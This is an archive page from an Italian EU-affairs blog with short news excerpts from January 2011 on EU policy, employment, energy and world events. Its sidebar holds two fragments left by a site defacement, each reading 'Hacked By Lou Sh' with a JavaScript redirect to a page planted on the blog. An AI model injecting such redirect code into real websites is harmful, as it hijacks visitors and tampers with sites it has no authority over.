EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Gennaio 2011
it

L’Organizzazione per la Cooperazione e lo Sviluppo Economico è un organismo internazionale con sede in Francia, a Parigi, che ha come obiettivo lo studio del sistema economico e democratico dei paesi membri. L’organizzazione nacque nell’immediato secondo dopoguerra con il fine di analizzare le esigenze finanziarie dei paesi colpiti dal conflitto, per permettere un intervento mirato di ricostruzione e modernizzazione del comparto industriale attraverso l’European Recovery Program. Oggi, l’ente pubblica ciclicamente rapporti riguardanti l’andamento produttivo nei diversi settori dei paesi consociati.

Nel maggio 2010, l’Ocse ha reso noti i dati riguardanti la crescita e la disoccupazione dell’Italia e le notizie che giungono al di là delle Alpi ci indicano che “niente di nuovo è cambiato sul fronte occidentale”: il trend economico dell’Italia risente ancora della crisi finanziaria del 2008 e le (...)

it

Il rapporto Eurostat sottolinea che nel decennio appena concluso, nonostante la crisi economica di fine periodo, la partecipazione delle donne al mercato del lavoro e' aumentata, con una diminuzione della disoccupazione dal 39,9% del 2000 al 35,7% del 2009.

Questo significa che in 9 anni oltre 5 milioni di donne in più sono entrate sul mercato del lavoro. Nonostante la crisi economica, tra il 2008 e il 2009 il numero di donne sul mercato del lavoro e’ continuato ad aumentare, passando il tasso di inattività dal 36,1% al 35,7%. (...)

it

È entrata in vigore una legge che prevede l’estensione del divieto di fumo in tutti gli edifici pubblici, ospedali, scuole e locali, negozi e edifici non privati. La Spagna diventa così uno dei paesi all’avanguardia in materia, e si aggiunge ad altri Stati che già adottano questi provvedimenti.

Tempi duri per gli spagnoli amanti del tabacco. Con la messa in opera della nuova legge approvata lo scorso autunno dal parlamento locale infatti non è più possibile fumare in luoghi pubblici, nonché anche negli spazi all’aperto di scuole e ospedali: conseguenza di ciò è che dalla mezzanotte dello (...)

it

Il Parlamento europeo e la Fondazione del premio internazionale Carlo Magno di Aquisgrana indicono per il 2011 la nuova edizione del Premio europeo Carlo Magno della gioventù.

Possono partecipare al concorso i giovani provenienti dai 27 Stati membri e di età compresa tra i 16 ed i 30 anni, individualmente o in gruppo. Scopo di questa iniziativa, organizzata per la prima volta nel 2007, è quello di favorire lo sviluppo di una coscienza europea tra le generazioni più (...)

it

Nonostante la loro diversa origine, ogni pagina del calendario racconta una storia che ha un tema ricorrente: la lotta contro la discriminazione femminile. Nuovo anno, nuovi calendari. Calendari di tutti i tipi, fatti da uomini ma soprattutto da donne. Ma questa volta non si tratta del solito “calendario”, nell’accezione particolare con cui è usato il termine per indicare il più delle volte una raccolta di foto di nudo, di donne che mettono in mostra il loro corpo in varie pose per illustrare i dodici mesi in maniera del tutto sessuale e trasgressiva.

Qui invece abbiamo sotto gli occhi donne vestite, che non esibiscono le loro forme, ma le loro storie di vita e le loro attività. Si tratta del calendario 2011 dell’Eige, l’istituto europeo per l’uguaglianza di genere (European Institute for Gender Equality), l’organismo legato all’Unione Europea (...)

it

Il 2011 incomincia per l’Unione Europea all’insegna della libertà religiosa. Il diritto umano di poter professare il proprio credo è sempre stato legato alle vicende del Vecchio Continente, diventando uno dei valori fondanti della democrazia europea.

Il 1 gennaio 2011, ad Alessandria, nel cuore dell’Egitto, la cronaca ha riportato all’attenzione delle istituzioni comunitarie l’urgenza di proteggere le minoranze religiose sparse per il mondo e garantirne la libertà di culto: infatti, un’autobomba è esplosa davanti ad una chiesa copta alla fine (...)

it

Dal 1983 l’Anno Europeo rappresenta un’occasione per riflettere su un’importante tematica di rilievo comunitario. Inoltre, per questa edizione l’Unione Europea lavorerà in sinergia con le Nazioni Unite, in concomitanza con l’avvio dei lavori per l’Anno Internazionale Del Volontariato.

Forse non tutti ancora sanno che dal 1983 ogni anno il Consiglio dell’Unione Europea sceglie, su proposta della Commissione, un tema su cui incentrare le principali iniziative che nel corso di quello specifico anno si svolgeranno, con lo scopo di sensibilizzare i cittadini e i governi nazionali (...)

it

Natura 2000 è la rete europea che riunisce siti di interesse comunitario al fine di proteggere e conservare gli habitat e le specie, animali e vegetali del territorio. Le zone protette sono istituite nel quadro della "direttiva Habitat", che riveste un ruolo chiave nella protezione della biodiversità. La gestione dei siti avviene con la partecipazione degli attori locali. L’ introduzione della direttiva, infatti, stabilisce che: "[la direttiva habitat], il cui scopo principale è promuovere il mantenimento della biodiversità, tenendo conto allo stesso tempo delle esigenze economiche, sociali, culturali e regionali, contribuisce all'obiettivo generale di uno sviluppo durevole; che il mantenimento di detta biodiversità può in taluni casi richiedere il mantenimento e la promozione di attività umane."

Con l’estensione al 18% del territorio comunitario della rete Natura 2000 può dirsi raggiunto il tanto atteso “Obiettivo 2010”. Le tappe per arrivare a questo traguardo sono state elencate nel corso degli anni, ma sono state ufficializzare solo nel Piano di Attuazione elaborato nel corso del summit (...)

it

Le aziende di telefonia mobile si impegnano a loro volta a seguire le norme in materia dettate dagli organismi europei di normalizzazione CEN-CENELEC e ETSI per armonizzare i propri prodotti e garantire la compatibilità entro la fine del 2011, con buona pace per i consumatori e l’ambiente.

È questo solo l’ultimo passo di un processo cominciato nell’estate del 2009, quando la Commissione avviò dei contatti con i colossi della telefonia mobile con il duplice obiettivo di risolvere il problema dell’incompatibilità dei caricatori e di ridurre drasticamente la quantità di rifiuti generata (...)

it

La relazione elaborata dal Comité des Sages sulla digitalizzazione del patrimonio culturale europeo è stata presentata poche settimane fa da Neelie Kroes, vicepresidente della Commissione europea responsabile per l’Agenda digitale e a Androulla Vassiliou, commissaria responsabile per Educazione e cultura. La relazione contiene un invito esplicito agli Stati membri dell'UE affinché intensifichino il loro impegno per la messa in rete di tutte le collezioni da essi detenute in biblioteche, archivi e musei, e sottolinea i benefici presentati da una maggiore accessibilità della cultura e delle conoscenze dell'Europa. Essa elenca inoltre i potenziali benefici economici della digitalizzazione per lo sviluppo di servizi innovativi in alcuni settori come turismo, ricerca ed educazione. L'obiettivo sostenuto dall'Agenda digitale è quello di rafforzare la libreria digitale Europeana e di presentare soluzioni per rendere disponibili in rete le opere tutelate da diritti d’autore. Le raccomandazioni contenute nella relazione confluiranno nella più vasta strategia attuata dalla Commissione, nell'ambito dell'Agenda digitale europea, al fine di favorire la transizione delle istituzioni culturali verso l'era digitale.

Neelie Kroes ha dichiarato, a riguardo del progetto: "Ringrazio di cuore i tre "saggi" per i validi suggerimenti offerti su come avviare un "rinascimento digitale" in Europa. La messa in linea delle collezioni dei nostri musei e librerie consente non solo di mostrare la ricchezza della cultura (...)

it

Chi, come e quando comunica l'Unione europea in Italia? Quali sono le sue strategie ed i suoi strumenti? Risponde a questi interrogativi Vittorio Calaprice, funzionario della Rappresentanza in Italia della Commissione europea e responsabile delle reti d'informazione, intervenuto al corso di laurea in European Economy and Business Law della Facoltà di Economia dell'Università di Roma Tor Vergata ed intervistato dal nostro blog in collaborazione con uniroma.tv.

RP Come comunica l’Ue ai suoi cittadini? VC La Commissione europea ha deciso di utilizzare la cosiddetta comunicazione integrata mettendo insieme sia i classici strumenti di informazione come le campagne di informazione, internet e l’audiovisivo con gli strumenti più avanzati come i social (...)

it

Boris Johnson, sindaco della capitale inglese dal 2008, ha lanciato una sfida per diffondere ed incrementare l’uso delle due ruote ecologiche e dare la possibilità ai ciclisti di guidarle senza pericoli. Infatti l’iniziativa prevede non solo incentivi e installazioni di “bike sharing”, ma anche una vera e propria costruzione di “autostrade per biciclette”.

L’iniziativa ha avuto un successo inaspettato e lo confermano i numeri. Secondo i risultati ottenuti dagli studi della “Transport for London”, ad ottobre 2010 si è registrato quasi un 70% in più di ciclisti per le strade di Londra. Questo perché accanto al sistema di “bike sharing”, messo a punto e (...)

it

Lo scorso 13 gennaio il presidente della Commissione europea Jose Barroso e il presidente dell'Azerbaijan Ilham Aliyev hanno firmato una dichiarazione congiunta con la quale il paese del Caspio "si impegna a fornire volumi di gas a lungo termine per l'Unione europea, mentre l'Europa gli fornisce l'accesso al suo mercato" dell'energia.

Per Barroso l’accordo, raggiunto presso la capitale azera Baku, assicurerà all’Europa una "quantità sufficiente" di gas per realizzare il cosiddetto "corridoio Sud: la nuova strada che aumenterà la sicurezza energetica dell’Europa". La realizzazione del nuovo corridoio di rifornimento, che garantirà (...)

it

A distanza di due giorni dalla chiusura dei seggi elettorali in Sudan, il capo della missione dell'Unione Europea, Veronique de Keyser, ha dichiarato che i giusti termini per descrivere il referendum sono "credibile" e "pacifico". ''Se dovessi riassumere lo svolgimento del referendum, potrei dire che ha avuto uno svolgimento libero e pacifico e che l'affluenza e' stata travolgente''.

I primi risultati del voto indicano una consistente maggioranza a favore del distacco dal nord musulmano, dopo decenni di logorante guerra civile. Gli osservatori dell’Unione europea, presenti in Sudan per le elezioni presidenziali, legislative e regionali in programma dall’11 al 13 aprile (...)

it

Il Re abdica: la notizia è stata resa nota con un comunicato dalla Apple in questi giorni, ad inviare una mail ai suoi collaboratori è stato invece lo stesso Steve Jobs il quale spiega di aver chiesto ed ottenuto dal board dei direttori la possibilità di allontanarsi momentaneamente per potersi occupare interamente del suo delicato stato di salute.

Jobs conferma che manterrà la sua nomina di amministratore delegato, continuando cosi a prendere parte alle decisioni più importanti riguardanti l’azienda, ma, per quanto riguarda la gestione quotidiana dell’impresa le redini passano nella mani di Tim Cook, al quale Jobs rinnova pubblicamente tutta (...)

it

Dopo le elezioni presidenziali del 31 ottobre 2010, in Costa d’Avorio è scoppiata una vera e propria rivoluzione. Il “casus belli” sarebbe, riportando le parole del Presidente Gbagbo, la presenza di brogli elettorali per mano dell’altro candidato, Alassane Outtara. La situazione ora è ancor più caotica perché i sostenitori di Outtara, a loro volta, accusano Gbagbo di voler insabbiare il risultato con la consapevolezza di esser stato sconfitto. In questo difficile scenario si è inserita l’Ue che da dicembre sta prendendo provvedimenti contro la forzatura di Gbagbo.

Da gennaio nuove sanzioni sono state prescritte dall’Unione Europea contro Laurent Gbagbo, autoproclamatosi Presidente della Repubblica in seguito alla sconfitta alle elezioni e il rifiuto di lasciare il potere. Le sanzioni imposte da Bruxelles, sono state estese ad 84 dei suoi più fidati (...)

it

Dal 15 al 26 Giugno 2010 si è tenuto a Toronto il primo G(irls)20 Summit. Ventuno giovani ragazze, tra i 18 e i 20 anni, provenienti dai Paesi del G20 e dall’Unione Africana, sono giunte a Toronto il 15 Gennaio 2010 - pochi giorni prima del G20 ufficiale - per discutere di politica, economia, diritti umani, educazione, salute, sviluppo.

“Le delegate del G(irls)20 Summit sono ventuno giovani donne che si sono riunite per essere le catalizzatrici del cambiamento” ha dichiarato Belinda Stronach, fondatrice di The Belinda Stronach Foundation, la fondazione che ha organizzato il vertice. “Hanno l’opportunità di lavorare insieme per (...)

it

Il recente caso di contaminazione da diossina avvenuto in Germania rappresenta il ritorno di un allarme che sembra colpire con cadenza quasi ciclica gli allevamenti europei dalla fine degli anni ’90 in poi. Un problema all’apparenza molto difficile da risolvere per l’Unione, che in merito vanta una normativa continentale evidentemente troppo blanda visto il ripetersi delle contaminazioni. L’ultimo fatto ha inoltre scatenato le vivaci proteste della Confagricoltura nei confronti degli allevatori tedeschi, rei a proprio giudizio di aver comunicato con colpevole ritardo l’accaduto.

Le accuse della Confagricoltura riguardano quindi la presunta violazione del regolamento comunitario sulla rintracciabilità 178/2002. Questo regolamento prevede l’obbligo per tutti gli operatori del comparto alimentare e dei mangimi di garantire la rintracciabilità degli alimenti “dalla terra (...)

it

Il termine per le iscrizioni scadrà la prossima settimana, mentre l’attività didattica si svolgerà dal 14 febbraio al 12 luglio 2011 e sarà articolata in otto ore settimanali per un totale di 400 ore.

L’ASI, Agenzia Spaziale Italiana, e la SIOI, Società Italiana per l’Organizzazione Internazionale, patrocinano la terza edizione del Master Europeo in Istituzioni e Politiche Spaziali, in collaborazione con Istituto di Studi Giuridici Internazionali del CNR. Questa è l’ultima settimana per potersi (...)

it

Vento gelido spira dal sud-est dell’Europa. L’Albania, il Paese delle aquile, dal giugno 2009 sta attraversando una profonda crisi economica e politica, improvvisamente degenerata in violenti scontri di piazza avvenuti nella capitale, Tirana, il 21 gennaio 2011.

I tumulti di questi giorni sembrano farci rivivere una storia già raccontata: era il febbraio del 1997, quando la situazione in quei territori diventava incandescente a causa del crollo “delle piramidi finanziarie“. L’economia albanese, uscita nel 1990 da una situazione di disastrosa pianificazione (...)

28
01
2011

Novità adozioni

it

Il Parlamento europeo ha votato all’unanimità lo scorso 19 gennaio la risoluzione riguardante la richiesta di una politica unica per le adozioni al fine di incoraggiare questo nobile gesto attraverso una semplificazione delle procedure. L’accordo raggiunto vuole dare la massima importanza ai bambini e tutelare i loro interessi. La risoluzione approvata dal Parlamento riunito nella sua sede di Strasburgo (dove si tengono le assemblee plenarie dell’istituzione in questione) prevede una cooperazione a livello di Unione europea riguardo le politiche di adozione su scala internazionale. Il documento afferma una priorità all’adozione nel paese d’origine del minore e inoltre sottolinea come il ricorso ad istituti ed orfanotrofi debba essere una soluzione provvisoria.

Purtroppo, quando si tratta di unificare le diverse e numerose legislazioni nazionali, i problemi burocratici sono sempre quelli che creano i disagi maggiori: per questo motivi gli Stati si propongono di rinnovare il loro impegno nell’eliminazione della burocrazia superflua per consentire un più (...)

it

Dopo il successo delle quattro edizioni passate, torna il Premio del Parlamento europeo per il giornalismo. L'Istituzione europea, attenta alla crescente importanza dei media come strumenti democratici di informazione e divulgazione, indispensabili nel potenziare la comunicazione interna all'Unione e facilitarne la comprensione ai cittadini, da il via alle candidature per il 2011.

Il Concorso per il giornalismo si riconferma come importante riconoscimento del lavoro dei numerosi giornalisti residenti nell’Unione, che con la loro attività, contribuiscono a valorizzare il ruolo dell’Europa e a renderne note le politiche sociali, economiche e culturali. Se sei giornalista, (...)

it

Un dibattito non privo di interventi polemici. Presenti anche alcuni familiari delle vittime del terrorista. Nella risoluzione: “principi di giustizia non negoziabili”.

Cesare Battisti L’ex terrorista Cesare Battisti scortato da due guardie dopo la sua cattura in Brasile Il Parlamento europeo ha approvato, con 83 voti favorevoli, un contrario e due astenuti, una risoluzione in cui invita il Brasile all’estradizione in Italia di Cesare Battisti, colpevole di (...)

it

Lo scorso 25 Gennaio si è svolto nella Biblioteca del Senato “Giovanni Spadolini” il Convegno Internazionale “I Nuovi Cittadini: dai luoghi comuni ai beni comuni; l’immigrazione tra diritti, responsabilità e partecipazione”, promosso da Cittadinanzattiva e Ambasciata degli Stati Uniti d’America in Italia, sotto l’Alto Patronato del Presidente della Repubblica e con il Patrocinio del Senato della Repubblica e della Camera dei Deputati.

L’iniziativa, inserita nell’ambito dell’Anno Europeo del Volontariato 2011, ha riunito ospiti nazionali e internazionali, politici, magistrati, esponenti del terzo settore ed ha riscontrato grande adesione e partecipazione. Il tema affrontato è stato quello dell’Immigrazione, punto di discussione (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France